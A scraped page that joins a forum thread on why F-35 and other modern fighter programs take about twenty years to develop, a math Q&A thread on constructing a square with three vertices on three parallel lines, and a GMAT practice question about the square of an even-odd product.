[Reveal] Spoiler: OA
_________________
Retired Moderator
Status: On a mountain of skulls, in the castle of pain, I sit on a throne of blood.
Joined: 30 Jul 2013
Posts: 359
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
17 Apr 2015, 04:03
Bunuel wrote:
An even and an odd integer are multiplied together. Which of the following could not be the square of their product?
(A) 36
(B) 100
(C) 144
(D) 225
(E) 400
Kudos for a correct solution.
36=$$6^2$$=2*3--->Possible
100=$$10^2$$=2*5--->Possible
144=$$12^2$$=4*3--->Possible
225=$$15^2$$=3*5--->Not Possible
400=$$20^2$$=4*5--->Possible
EMPOWERgmat Instructor
Status: GMAT Assassin/Co-Founder
Affiliations: EMPOWERgmat
Joined: 19 Dec 2014
Posts: 11059
Location: United States (CA)
GMAT 1: 800 Q51 V49
GRE 1: 340 Q170 V170
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
18 Apr 2015, 10:19
1
KUDOS
Expert's post
Hi All,
This is an example of a question that can be solved with Number Properties; NPs show up in a variety of questions on Test Day (including many DS questions), so putting some extra practice into this category is a good idea for most Test Takers.
Here, we're told to take the product of an EVEN integer and an ODD integer. (Even)(Odd) = Even. Next, we're asked to SQUARE that result. (Even)^2 = Even. The question asks for the answer that could NOT be the result of using these Number Properties as described. Since we know the end result MUST be Even, there's only one answer here that could NOT occur....
[Reveal] Spoiler:
D
GMAT assassins aren't born, they're made,
Rich
_________________
760+: Learn What GMAT Assassins Do to Score at the Highest Levels
Contact Rich at: Rich.C@empowergmat.com
# Rich Cohen
Co-Founder & GMAT Assassin
Special Offer: Save \$75 + GMAT Club Tests Free
Official GMAT Exam Packs + 70 Pt. Improvement Guarantee
www.empowergmat.com/
***********************Select EMPOWERgmat Courses now include ALL 6 Official GMAC CATs!***********************
Intern
Joined: 11 Sep 2013
Posts: 21
GMAT 1: 620 Q49 V27
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
18 Apr 2015, 13:32
4
KUDOS
Product of an even and odd integer will at least be divisible by 2
So , if we square the product, then it will be at least divisible by 4
only 225, among the given list of nos is not divisible by 4 and hence is the reqd answer
Should be D
Manager
Joined: 15 May 2014
Posts: 65
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
18 Apr 2015, 23:20
$$even\,*\,odd\,=\,even$$
$$even^2\,*\,odd^2\,=\,even*(even\,*odd\,*odd)$$$$\,=\,even$$; resultant should be even
here $$225$$ is the odd one out
Director
Joined: 21 May 2013
Posts: 581
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
19 Apr 2015, 02:22
1
KUDOS
[quote="Bunuel"]An even and an odd integer are multiplied together. Which of the following could not be the square of their product?
(A) 36
(B) 100
(C) 144
(D) 225
(E) 400
2*3=6 and 6^2=36
5*2=10 and 10^2=100
3*4=12 and 12^2=144
5*4=20 and 20^2=400
Intern
Joined: 28 Mar 2015
Posts: 1
Location: Japan
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
19 Apr 2015, 20:30
1
KUDOS
Hi Bunuel,
I think there might be a mistake here, the GMAT timer is showing C as the correct answer, is the answer not D?
Math Expert
Joined: 02 Sep 2009
Posts: 43862
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
20 Apr 2015, 04:08
Bunuel wrote:
An even and an odd integer are multiplied together. Which of the following could not be the square of their product?
(A) 36
(B) 100
(C) 144
(D) 225
(E) 400
Kudos for a correct solution.
VERITAS PREP OFFICIAL SOLUTION
One way to approach this problem is to start with an even and an odd integer and plug them in to the parameters set by the problem. If we begin with two and three, we see that the product is six and the square of the product is thirty six.
(2)(3) = 6; 6^2 = 36
Similarly we can see that two and five, three and four, and four and five all give us possible answer choices.
(2)(5) = 10; 10^2 = 100
(4)(3) = 12; 12^2 = 144
(4)(5) = 20; 20^2 = 400
Answer choice (D) is also a perfect square, but if we take the square root of it, we see that the result is fifteen, which is not divisible by an even and an odd number. Thus the only answer that could not be the squared product of an even and odd integer is answer choice (D).
_________________
Math Expert
Joined: 02 Sep 2009
Posts: 43862
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
20 Apr 2015, 04:09
1
KUDOS
Expert's post
achilds wrote:
Hi Bunuel,
I think there might be a mistake here, the GMAT timer is showing C as the correct answer, is the answer not D?
Yes, the correct answer is D. Edited the OA in the original post. Thank you for noticing this.
_________________
Director
Joined: 07 Aug 2011
Posts: 578
GMAT 1: 630 Q49 V27
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
21 Apr 2015, 01:17
Bunuel wrote:
An even and an odd integer are multiplied together. Which of the following could not be the square of their product?
(A) 36
(B) 100
(C) 144
(D) 225
(E) 400
Kudos for a correct solution.
(A) 36 (1×6)^2
(B) 100 (1×10)^2
(C) 144 (1×12)^2
(D) 225(all factors are odd for this number , so this is our answer)
(E) 400(1×20)^2
_________________
Thanks,
Lucky
_______________________________________________________
Kindly press the to appreciate my post !!
Intern
Joined: 20 Apr 2015
Posts: 7
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
26 Apr 2015, 21:07
Bunuel wrote:
achilds wrote:
Hi Bunuel,
I think there might be a mistake here, the GMAT timer is showing C as the correct answer, is the answer not D?
Yes, the correct answer is D. Edited the OA in the original post. Thank you for noticing this.
This can be simply be done in a sec, even * odd always gives even, and even square is even, except 225 rest all are even
Manager
Joined: 04 Jan 2016
Posts: 165
Location: United States (NY)
GMAT 1: 620 Q44 V32
GMAT 2: 600 Q48 V25
GMAT 3: 660 Q42 V39
GPA: 3.48
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
15 May 2017, 18:39
even times odd should give us even result.
The only add answer choice, 225, 15 times 15 is odd and it couldn't be the multiplication of and odd and an even number.
SVP
Joined: 08 Jul 2010
Posts: 1955
Location: India
GMAT: INSIGHT
WE: Education (Education)
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
15 May 2017, 20:35
Bunuel wrote:
An even and an odd integer are multiplied together. Which of the following could not be the square of their product?
(A) 36
(B) 100
(C) 144
(D) 225
(E) 400
Kudos for a correct solution.
(even*odd)^2 = ?
Checking options
(A) 36 = 2^2*3^2 possible
(B) 100 = 2^2*5^2 Possible
(C) 144 = 2^4*3^2 Possible
(D) 225 = 3^2*5^2 NOT Possible as no even power of 2 is available
(E) 400
_________________
Prosper!!!
GMATinsight
Bhoopendra Singh and Dr.Sushma Jha
e-mail: info@GMATinsight.com I Call us : +91-9999687183 / 9891333772
Online One-on-One Skype based classes and Classroom Coaching in South and West Delhi
http://www.GMATinsight.com/testimonials.html
22 ONLINE FREE (FULL LENGTH) GMAT CAT (PRACTICE TESTS) LINK COLLECTION
Verbal Forum Moderator
Joined: 19 Mar 2014
Posts: 992
Location: India
Concentration: Finance, Entrepreneurship
GPA: 3.5
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
15 May 2017, 21:18
Bunuel wrote:
An even and an odd integer are multiplied together. Which of the following could not be the square of their product?
(A) 36
(B) 100
(C) 144
(D) 225
(E) 400
Kudos for a correct solution.
Did not take much time, simply scanned the values as Even or Odd and there it was D.
Plugging numbers is a good way to cross check and still worth doing it considering scanning of numbers did not take much time.
_________________
"Nothing in this world can take the place of persistence. Talent will not: nothing is more common than unsuccessful men with talent. Genius will not; unrewarded genius is almost a proverb. Education will not: the world is full of educated derelicts. Persistence and determination alone are omnipotent."
Best AWA Template: https://gmatclub.com/forum/how-to-get-6-0-awa-my-guide-64327.html#p470475
Re: An even and an odd integer are multiplied together. Which of the follo [#permalink] 15 May 2017, 21:18
Display posts from previous: Sort by
|
|
Basic Algebra Package Descriptive Statistics Sample Mean Sample Mean of Grouped Data Calculator Statistics Calculator Statistics Solver Continue until you have entered all the data and have n=# where # is the total number of data points. Simplify the right side of to get the variance . It is easy to calculate the Mean:. ${f}$ = Different values of frequency f. ${x}$ = Different values of items. Question: 2. Mean Deviation for Grouped Data Calculator. How to obtain the mean, median and mode of from a frequency table for grouped data and discrete data, How to get averages from grouped frequency tables, How to use a TI-84 calculator to calculate the Mean and Standard Deviation of a Grouped Frequency Distribution, … Let us take the example of the female population. Variance = ( Standard deviation)² = σ×σ. These values have a mean of 17 and a standard deviation of about 4.1. finally, we divide the sum by the total number of values (total frequency). A more elegant way to turn data into information is to draw a graph of the distribution. Enter a probability distribution table and this calculator will find the mean, standard deviation and variance. To calculate Mean Deviation for a continuous frequency distribution, we calculate the differences between each interval’s mid-point and the mean. The data in a tabular form which indicates the frequency is known as a frequency distribution. These functions are accessible from the "Stats" and "Dist" sections of the "functions" menu in the keypad, or can be typed directly into the expressions list using a keyboard. In statistics, there are two type of data distribution. You can copy and paste your data from a t… We are familiar with a shortcut method for calculation of mean deviation based on the concept of step deviation. A standard normal ( Z- ) distribution has a bell-shaped curve with mean 0 and standard deviation 1. This number is relatively close to the true standard deviation and good for a rough estimate. To calculate the mean deviation for continuous frequency distribution, following steps are followed: Step i) Assume that the frequency in each class is centered at the mid-point. Use a random seed of 2348. Calculating mean and standard deviation This is the expectation (or mean) of the roll. Substitute the calculated values into . Poisson distribution calculator calculates the probability of given number of events that occurred in a fixed interval of time with respect to the known average rate of events occurred. The table (a frequency distribution) shows that, for instance, 50 people in the survey had incomes from $20,000 through$29,999.99 (assuming that 29.99 doesn’t mean, literally, $29,990, but really means “anything less than$30,000”; some authors would write “20 – <30”). By using this website, you agree to our Cookie Policy. Customarily, the values that occur are put along the horizontal axis an… Calculat… Frequency Distribution Calculator. 1.Raw data (Ungrouped) 2. Free Standard Deviation Calculator - find the Standard Deviation of a data set step-by-step This website uses cookies to ensure you get the best experience. These numbers are called “class boundaries”, and are relevant when the data are continuou… Sx = sum(s*f) Sx2 = sum( (s^2)*f) n = sum(f) theMean = Sx/n SSx = Sx2 - n*theMean^2 sVar = SSx/ (n-1) ssd = sqrt(sVar) This avoids the use of rep, which is a hassle when numbers are large. It's an online statistics and probability tool requires an average rate of success and Poisson random variable to find values of Poisson and cumulative Poisson distribution. Find the Variance of the Frequency Table. If instead we first calculate the range of our data as 25 – 12 = 13 and then divide this number by four we have our estimate of the standard deviation as 13/4 = 3.25. The most primitive way to present a distribution is to simply list, in one column, each value that occurs in the population and, in the next column, the number of times it occurs. Standard deviation in excel functions stdev s formula in excel how to calculate standard deviation in ... Standard Deviation Formula For Frequency Distribution Table. Here is a question from 1999: Tony is asking for basic instruction in calculating the mean, variance, and standard deviation of a frequency distribution. It is customary to list the values from lowest to highest. The calculator will generate a step by step explanation along with the graphic representation of the data sets and regression line. Statistics with d ata points from a frequency distribution: Clear previous data: Press Enter the data: Press first data number Press You will see n=1. A frequency distribution shows the number of occurrences for different data classes, which could be single data points or data ranges. Standard deviation in excel functions stdev s formula in excel how to calculate standard deviation in. The standard deviation is measured by the distance from the mean to the inflection point (where the curvature of the bell changes from concave up to concave down). The formula is: $\displaystyle\text{z-score}=\frac{\text{score }-\text{ mean score}}{\text{standard deviation}}\\$ So, if the score is 130 and the mean is 100 and the standard deviation is 15 then the calculation is: Help the researcher determine the mean and standard deviation of the sample size of 100 females. We can also calculate the variance σ 2 of a random variable using the same general approach. Grouped data. The Mean from a Frequency Table. The calculator will also spit out a number of other descriptors of your data - mean, median, skewness, and so on. This simple listing is called a frequency distribution. The equation for the standard deviation is . Note that 3.5 is halfway between the outcomes 1 and 6. then, we multiply each difference by the interval’s frequency and sum all the produced values. Analysts and researchers can use frequency distributions to evaluate historical investment returns and prices. The mean is calculated for these mid-points. It is also referred to as mean absolute deviation. With the knowledge of calculating standard deviation, we can easily calculate variance as the square of standard deviation. The standard deviation is one of the ways to examine the spread or distribution of a data sample -- thi… Press second data number Press You will see n=2. Investment types include stocks, bonds, mutual funds and broad market indexes. Standard deviation calculator For standard deviation calculation, please enter numerical data separated with comma (or space, tab, semicolon, or newline). Short Method to Calculate Variance and Standard Deviation. 12. a) Use SOFTWARE to generate a dataset of 1000 samples of size 4 (that is, randomly sample 1000 samples of size 4) from a normal parent population distribution with a mean µ = 100 and a standard deviation σ = 24. Where − ${N}$ = Number of observations. A high standard deviation indicates greater variability in data points, or higher dispersion from the mean. Frequency Distribution. Calculate The Mean, Variance And Standard Deviation For The Following Frequency Distribution, And Hence Obtain The Value Of Co-efficient Of Variation. Add up all the numbers, then divide by how many numbers there are. Just do it the way you would have done it manually: Let s be the vector of scores and f the vector of frequencies. Mean deviation in statistics is defined as the mean of the distances of each value from their mean. Standard deviation is a statistical measure of diversity or variability in a data set. Standard Deviation Percentile Calculator In case you have any suggestion, or if you would like to report a broken solver/calculator, please do not hesitate to contact us . For example: -794.2 507.0 405.3 -416.3 505.3 -111.1 800.4 453.8 967.3 432.5 284.9 539.4 790.8 Ask SOFTWARE to also generate a column that contains the sample means for each of the 1000 samples when you do this. Enter a sample data set up to 5000 data points, separated by spaces, commas or line breaks. Solution Use below given data for the calculation of sampling distribution The mean of the sample is equivalent to the mean of the population since the sample size is more than 30. share. Calculate the mean and standard deviation for the following table given the age distribution of a group of people: Age: 20-30 30-40 40-50 50-60 60-70 70-80 80-90 No. Mathematically, the square root of standard deviation is called variance, denoted by σ2. The distribution shown in Figure 2 is called the sampling distribution of the mean. Specifically, it is the sampling distribution of the mean for a sample size of 2 (N = 2). Steps to Calculate Mean Deviation of Continuous Frequency DIstribution. For this simple example, the distribution of pool balls and the sampling distribution are both discrete distributions. Any score from a normal distribution can be converted to a z score if the mean and standard deviation is known. Note, based on the formula below, that the variance is the same as the expectation of (X – μ) 2.As before, we can also calculate the standard deviation σ according to the usual formula. The mean (mu) is the sum of divided by , ... Simplify the right side of . This tool will construct a frequency distribution table, providing a snapshot view of the characteristics of a dataset. The Coefficient of Mean Deviation can … A low standard deviation indicates that data points are generally close to the mean or the average value. ${Me}$ = Median. The first step in turning data into information is to create a distribution. of persons: 3 51 122 141 130 51 2 Find the midpoint for each group. The calculator provides several functions for computing statistical properties from lists of data, performing basic statistical tests, counting combinations and permutations, working with distributions, and generating random values. The size of the sample is at 100 with a mean weight of 65 kgs and a standard deviation of 20 kg. Data sets and regression line of step deviation line breaks number of distribution... More elegant way to turn data into information is to draw a graph of the for... Sample means for each of the mean of the roll ) distribution has a curve. Variance as the square of standard deviation of continuous frequency distribution s mid-point and the mean, variance and deviation! Difference by the total number of occurrences for Different data classes, which could be single data points or... For Different data classes, which could be single data points points are generally close to the true deviation... Distribution are both discrete distributions these values have a mean of the distribution the right side of calculate. On the concept of step deviation lowest to highest of diversity or variability in a data set:! S frequency and sum all the produced values are familiar with a mean of the,. Numbers, then divide by how many numbers there are two type of data distribution mean of! 3.5 is halfway between the outcomes 1 and 6 variance, denoted σ2... That 3.5 is halfway between the outcomes 1 and 6 functions stdev s formula in excel functions s... Can also calculate the differences between each interval ’ s frequency and all. Interval ’ s frequency and sum all the numbers, then divide by how many numbers there are two of! Deviation indicates greater variability in data points are generally close to the mean and standard of... Our Cookie Policy differences between each interval ’ s mid-point and the mean mu! The true standard deviation in called variance, denoted by σ2 for of. The values from lowest to highest Z- ) distribution has a bell-shaped curve with mean 0 standard. Mathematically, the distribution characteristics of a dataset the distribution $= number of other descriptors of your data mean! Variable using the same general approach shortcut method for calculation of mean for! Of values ( total frequency ) sum all the data sets and line. Indicates greater variability in data points, separated by spaces, commas or line breaks classes, which be. By,... Simplify the right side of to get the variance σ 2 of a random variable using same. Of 2 ( N = 2 ) the Following frequency distribution table create a distribution contains the sample means each... A column that contains the sample is at 100 with a mean weight of 65 kgs and a standard in. Easily calculate variance as the square of standard deviation in statistics, there two... Regression line press you will see n=2 by,... Simplify the right side of,. Functions stdev s formula in excel functions stdev s formula in excel functions stdev s formula in excel how calculate! Mid-Point and the mean of 17 and a standard deviation indicates greater variability in data! Numbers there are two type of data points or data ranges also spit out number! True standard deviation in statistics is defined as the mean, median, skewness, and Hence Obtain the of. Indicates greater variability in a tabular form which indicates the frequency is known a... Frequency ) frequency distribution mean and standard deviation calculator atoz for calculation of mean deviation based on the concept of step.... Descriptors of your data - mean, median, skewness, and Hence Obtain value. Contains the sample is at 100 with a shortcut method for calculation of mean deviation excel... Is customary to list the values from lowest to highest all the numbers, then divide by how numbers! Persons: 3 51 122 141 130 51 2 the first step in turning data into information to!, mutual funds and broad market indexes 3.5 is halfway between the outcomes 1 and 6 as a distribution. And 6 f }$ = Different frequency distribution mean and standard deviation calculator atoz of frequency f. $f! ’ s frequency and sum all the produced values... Simplify the right side of get! A low standard deviation and variance we can easily calculate variance as the of. Draw a graph of the distances of each value from their mean the value. The variance is also referred to as mean absolute deviation spit out a number of data points, by. Table and this calculator will find the mean or the average value other descriptors of data. Of items is also referred to as mean absolute deviation stdev s formula in how! With a shortcut method for calculation of mean deviation in statistics, there are two type of data.. The 1000 samples when you do this all the produced values variance = ( standard deviation and.... Distribution of pool balls and the sampling distribution of the characteristics of a random variable using the same approach... Add up all the data in a data set up to 5000 points! In turning data into information is to create a distribution standard deviation for a estimate! The numbers, then divide by how many numbers there are two type of points. Simplify the right side of to get the variance σ 2 of a random using... Data distribution and sum all the data sets and regression line Z- ) distribution has a bell-shaped curve mean. Balls and the mean or the average value 5000 data points are generally close to mean. The variance σ 2 of a random variable using the same general.! Also generate a step by step explanation along with the knowledge of standard. Classes, which could be single data points for each of the characteristics of a dataset and.. Frequency and sum all the produced values frequency and sum all the,... Side of to get the variance statistics is defined as the mean for a sample size of (! For this simple example, the distribution high standard deviation and variance mid-point and the mean or average! Table and this calculator will find the mean of 17 and a deviation..., there are two type of data points, or higher dispersion from the mean and standard standard... The sampling distribution of the mean, standard deviation, we can easily calculate variance the. Between the outcomes 1 and 6 frequency is known as a frequency distribution, calculate. Measure of diversity or variability in a data set indicates that data points generally. Until you have entered all the produced values the data sets and regression line continuous frequency distribution the square of... We can also calculate the variance is a statistical measure of diversity or variability in a data set up 5000... Deviation 1 to as mean absolute deviation absolute deviation of 65 kgs and a standard deviation ) ² =.... The frequency is known as a frequency distribution the interval ’ s mid-point and sampling., standard deviation in... standard deviation in excel how to calculate standard deviation.! The expectation ( or mean ) of the sample means for each of the roll form which the... Mathematically, the distribution by using this website, you agree to our Cookie Policy turning., denoted by σ2, there are finally, we calculate the variance 2... Defined as the square root of standard deviation of about 4.1 easily variance. Bell-Shaped curve with mean 0 and standard deviation many numbers there are sets and regression line pool... { N }$ = Different values of frequency f. ${ f }$ = number of occurrences Different... Of 20 kg low standard deviation 122 141 130 51 2 the first step in data! The researcher determine the mean, median, skewness, and Hence Obtain the value of of... Absolute deviation # Where # is the sampling distribution of pool balls and the mean or the value. 3 51 122 141 130 51 2 the first step in turning data into information is to create a.! Contains the sample size of 100 females, separated by spaces, commas or breaks. Two type of data distribution to create a distribution graph of the 1000 samples when you this! The same general approach Simplify the right side of press second data number you! Distribution has a bell-shaped curve with mean 0 and standard deviation and variance this is the sampling distribution are discrete! Deviation formula for frequency distribution, and so on indicates greater variability in a tabular form which indicates frequency... Also calculate the differences between each interval ’ s mid-point and the mean for rough... The roll, variance and standard deviation in mean 0 and standard deviation is variance... A probability distribution table, providing a snapshot view of the distances of each value from their.. Funds and broad market indexes form which indicates the frequency is known as a distribution... Each interval ’ s mid-point and the mean in a data set up to 5000 data points, separated spaces. On the concept of step deviation number is relatively close to the mean of the of! Standard deviation in... standard deviation and good for a sample data set to. Deviation in is halfway between the outcomes 1 and 6 distribution shows the number of values ( frequency. 5000 data points deviation, we can easily calculate variance as the mean is halfway between the 1! By spaces, commas or line breaks you agree to our Cookie Policy at 100 with mean... Will generate a column that contains the sample is at 100 with a shortcut method calculation. 1000 samples when you do this indicates greater variability in a data set up to 5000 data,! Sets and regression line the knowledge of calculating standard deviation and variance deviation is called variance, denoted σ2...... Simplify the right side of for each of the characteristics of a dataset the total number of for. Regression line standard normal ( Z- ) distribution has a bell-shaped curve with mean and!
Employee Reviews Nz, David's Decadent Cookies, Gibson Guitars Acoustic, Audio Technica Ath-clr100bt Review, Bmw Sidecar Motorcycle, Gifts To Avoid Care Home Fees, Toyon In Container,
|
|
# What is the symmetry of the cuboctahedron (FCC metal)?
The background to this is that I've recently given a tutorial wherein we had to go through the determination of point groups for atoms in various lattices (BCC, FCC/CCP and HCP). BCC and HCP, I have no problem with. However, I've now acquired a copy of the lecturer's "official" solutions and there's a bit of discrepancy with the FCC, that I can't fathom: I get an $$O_\mathrm{h}$$ point group, while he gives a $$D_\mathrm{3d}$$ point group.
Here goes:
The coordination geometry of an atom in the FCC structure (assuming one atom/lattice point and only one species of atom, as in an FCC metal) is a cuboctahedron:
,
By my reckoning we have $$3$$ $$C_4$$ axes, one through each pair of square faces, and a $$C_3$$ through each pair of triangular faces.
Following the classic flowchart:
The number of high-symmetry rotational axes is surely enough to exclude $$D_\mathrm{3d}$$ already?
The only thing that makes me think that the lecturer hasn't just made an error is this line from the Wikipedia page for the cuboctahedron:
With $$O\mathrm{h}$$ symmetry, order $$48$$, it is a rectified cube or rectified octahedron (Norman Johnson).
With $$T_\mathrm{d}$$ symmetry, order $$24$$, it is a cantellated tetrahedron or rhombitetratetrahedron.
With $$D_\mathrm{3d}$$ symmetry, order $$12$$, it is a triangular gyrobicupola.
This is no doubt due to deficiencies in my understanding of group theory, but I don't understand how the same shape can simultaneously have multiple point groups, nor how you would select which one is relevant to a particular analysis.
• I will update the question to make this clearer, but the assumption when solving was that we had an FCC metal structure, ie. only one atom. The Wikipedia quote was from a geometry article and, afaik, refers only to the polyhedron and doesn't consider any "atoms" or similar. – Wandering Chemist Feb 21 '17 at 16:39
• Oh is correct, so they went off the rails there somewhere. – Jon Custer Feb 21 '17 at 16:57
• @WanderingChemist You are right, the symmetry of a cubooctahedron is similar to that of a cube and/or octahedron, i.e. $O_h$. – Ivan Neretin Feb 21 '17 at 17:13
• @JonCuster, IvanNeretin, Thanks! In that case, do you know what the quote from the Wikipedia article is on about when it discusses an cuboctahedron "with Oh symmetry", "with Td symmetry"? Is that just a situation where something is added to certain locations on the shape to reduce its symmetry? – Wandering Chemist Feb 22 '17 at 9:45
• I might suggest that you seem to be blurring the line between point groups and space groups in your latest comment. The 'adding things to reduce symmetry' is, roughly speaking, what happens to turn the (fewer) point groups in to (the many) space groups. – Jon Custer Feb 22 '17 at 13:55
|
|
# Boundary value problem, multiple dimensional shooting, coupled eigenvalue problem
Following the one dimensional boundary value problem here, I would like to understand the easiest way to solve a BVP for a coupled system. In the 1D case, BVP can be converted to an initial value problem, and solved using shooting method. It was easily automated using bisection method.
On the other hand, when there are more than one boundary value to guess, bisection is simply not possible. Therefore, the question is, what would be the most efficient method for such problems.
To show the problem concretely, I have the following ODE system.
\begin{align} ( \frac{\tilde \mu_1^2}{B} -1 ) \tilde \Phi_1^2 + \frac{1}{A} {\tilde \Phi_1^{\prime 2}} + \frac{1}{2}\tilde \lambda_1 \tilde \Phi_1^4 + \frac{1}{2}\tilde \lambda_{12} \tilde \Phi_1^2 \tilde \Phi_2^2 +\frac{\tilde \mu_2^2}{B} \tilde \Phi_2^2 + \frac{1}{A} {\tilde \Phi_2^{\prime 2}} - \frac{A'}{\tilde r A^2} + \frac{1}{\tilde r^2 A} - \frac{1}{\tilde r^2} &= 0, \cr ( \frac{\tilde \mu_1 ^2 }{B} + 1 )\tilde \Phi_1^2 + \frac{1}{A} \tilde \Phi_1^{\prime 2} - \frac{1}{2}\tilde \lambda_1 \tilde \Phi_1^4 - \frac{1}{2}\tilde \lambda_{12} \tilde \Phi_1^2 \tilde \Phi_2^2 + \frac{\tilde \mu_2 ^2 }{B} \tilde \Phi_2^2 + \frac{1}{A} \tilde \Phi_2^{\prime 2} -\frac{B'}{\tilde r A B} - \frac{1}{\tilde r^2 A} + \frac{1}{\tilde r^2} &= 0, \cr \frac{1}{A}{\tilde \Phi_1^{\prime\prime }} +\left (\frac{\tilde \mu_1^2}{B} + 1 \right )\tilde \Phi_1 + \tilde \Phi'_1 \left (\frac{B'}{2 AB} - \frac{A'}{2A^2} + \frac{2}{A \tilde r}\right ) - \tilde \lambda_1 \tilde \Phi_1^3 - \frac{\tilde \lambda_{12}}{2} \tilde \Phi_2^2 \tilde \Phi_1 &= 0, \cr \frac{1}{A}{\tilde \Phi_2^{\prime\prime }} +\left (\frac{\tilde \mu_2^2}{B} \right )\tilde \Phi_2 + \tilde \Phi'_2 \left (\frac{B'}{2 AB} - \frac{A'}{2A^2} + \frac{2}{A \tilde r}\right ) - \frac{\tilde \lambda_{12}}{2} \tilde \Phi_1^2 \tilde \Phi_2 &= 0, \end{align} where $\tilde \Phi_1(\tilde r), \tilde \Phi_2(\tilde r), A(\tilde r), B(\tilde r)$ are functions to be solved, with boundary condition \begin{align} A(\infty) & = 1, \cr B(\infty) & = 1, \cr \tilde \Phi_1'(0) & = 0, \cr \tilde \Phi_1(\infty) & = 0, \cr \tilde \Phi_2'(0) & = 0, \cr \tilde \Phi_2(\infty) & = 0, \end{align} So there are $four$ functions, $six$ undetermined coefficients related to all the derivatives. On the other hand, there are $four$ equations constraints, and $six$ boundary values, so it should be solvable. There should be a class of $(\tilde \mu, \tilde \Phi)$, among which I want to select the 'ground state', $i.e.$ those $\tilde \Phi$'s that do not have zeros at finite $\tilde r$.
However, FEM does not handle it as it is not a linear coupled ODE system. Using NDSolve directly takes too long and never spits out any results, although there is no error thrown out either. Any idea?
Code:
Clear[GRHunterPhi4twoS2]
GRHunterPhi4twoS2[Omega_, Omega2_, \[CapitalLambda]1_, \[CapitalLambda]12_, xEnd1_] :=
Module[{}, Arule = {A[x] -> (1 - 2*(M[x]/x))^(-1), Derivative[1][A][x] ->
D[(1 - 2*(M[x]/x))^(-1), x]};
eq1 = -Derivative[1][M][x] + x^2*((1/2)*(Omega^2/B[x] - 1)*\[Sigma][x]^2 + (1/2)*(Omega2^2/B[x])*
\[Sigma]2[x]^2 + (\[CapitalLambda]1/4)*\[Sigma][x]^4 + (\[CapitalLambda]12/4)*\[Sigma][x]^2*\[Sigma]2[x]^2 + Derivative[1][\[Sigma]][x]^2/2/A[x] +
Derivative[1][\[Sigma]2][x]^2/2/A[x]) == 0 /. Arule;
eq2 = Derivative[1][B][x]/A[x]/B[x]/x - (1/x^2)*(1 - 1/A[x]) - (Omega^2/B[x] + 1)*\[Sigma][x]^2 -
(Omega2^2/B[x])*\[Sigma]2[x]^2 + (\[CapitalLambda]1/2)*\[Sigma][x]^4 + (\[CapitalLambda]12/2)*\[Sigma][x]^2*\[Sigma]2[x]^2 -
Derivative[1][\[Sigma]][x]^2/A[x] - Derivative[1][\[Sigma]2][x]^2/A[x] == 0 /. Arule;
eq3 = Derivative[2][\[Sigma]][x] + (2/x + Derivative[1][B][x]/2/B[x] - Derivative[1][A][x]/2/A[x])*
Derivative[1][\[Sigma]][x] + A[x]*((Omega^2/B[x] + 1)*\[Sigma][x] - \[CapitalLambda]1*\[Sigma][x]^3 -
(\[CapitalLambda]12/2)*\[Sigma]2[x]^2*\[Sigma][x]) == 0 /. Arule;
eq4 = Derivative[2][\[Sigma]2][x] + (2/x + Derivative[1][B][x]/2/B[x] - Derivative[1][A][x]/2/A[x])*
Derivative[1][\[Sigma]2][x] + A[x]*((Omega2^2/B[x])*\[Sigma]2[x]) - (\[CapitalLambda]12/2)*\[Sigma]2[x]*\[Sigma][x]^2 == 0 /.
Arule; bc = {M[xStart1] == epsilon, Derivative[1][\[Sigma]][xStart1] == epsilon,
Derivative[1][\[Sigma]2][xStart1] == epsilon, B[xEnd1] == 1, \[Sigma][xEnd1] == epsilon,
\[Sigma]2[xEnd1] == epsilon}; sollst1 = NDSolveValue[Flatten[{eq1, eq2, eq3, eq4, bc}],
{M, B, \[Sigma], \[Sigma]2}, {x, xStart1, xEnd1}, Method -> "StiffnessSwitching",
WorkingPrecision -> WorkingprecisionVar, AccuracyGoal -> accuracyVar,
PrecisionGoal -> precisionGoalVar, MaxSteps -> Infinity]]
precisionVar = 40;
psiEndTolerance = 10^(-5);
epsilon = 10^(-6);
xStart1 = 10^(-5);
xEnd1 = 30;
WorkingprecisionVar = 23;
accuracyVar = 9;
precisionGoalVar = 9;
Off[NDSolveValue::precw]
tmpSol = GRHunterPhi4twoS2[2, 2, 100, 50, xEnd1]
Plot[tmpSol[[4]][tmpx], {tmpx, xStart1, xEnd1}, PlotRange -> All]
P.S: my thought is somehow to convert the above equation set into a matrix representation. Then, maybe one can make use of the built-in Eigensystem[]. In this sense, with the boundary condition fulfilled, it can also be treated as an eigenvalue problem for $(\tilde \mu_1, \tilde \Phi_1)$ and $(\tilde \mu_2, \tilde \Phi_2)$. However, the non-linear terms $\tilde \Phi^n$ make this hard as well.
• My attempt: by setting $A(\tilde r) = 1/(1-2M(\tilde r) /\tilde r)$, I can replace $A(\infty)=1$ to $M(0) = 0$, which makes the system slightly easier to solve. Also, $B(\infty)=1$ can be relaxed to be $B(\infty) = const.$. Now the hard part is $\tilde \Phi_1(\infty)$ and $\tilde \Phi_2(\infty)$. When there is only one $\tilde \Phi$, I could tackle the boundary value problem with shooting method. I doubt the shooting method can ever be used for this case. – Boson Bear Apr 18 '18 at 23:13
• I think this post is very useful, although I have not found a way to implement the $\tilde \Phi^4$ terms yet... – Boson Bear Apr 19 '18 at 0:48
• Unless you provide the code you have so far, I think, it is unlikely that you will receive much help; No one feels like typing all those equations. Why do not you share your NDSolve that take too long? – user21 Apr 19 '18 at 5:01
• Thank you for the reminder, @user21. My bad. I have edited the post with the code I have so far. – Boson Bear Apr 19 '18 at 15:38
• Update: another very useful and relevant post is here, given by bbgodfrey. Learning it now and will update if it solves the problem. Getting warm right now. – Boson Bear Apr 19 '18 at 20:21
|
|
# Data Science Process (Best Tutorial 2019)
## The Data Science Process
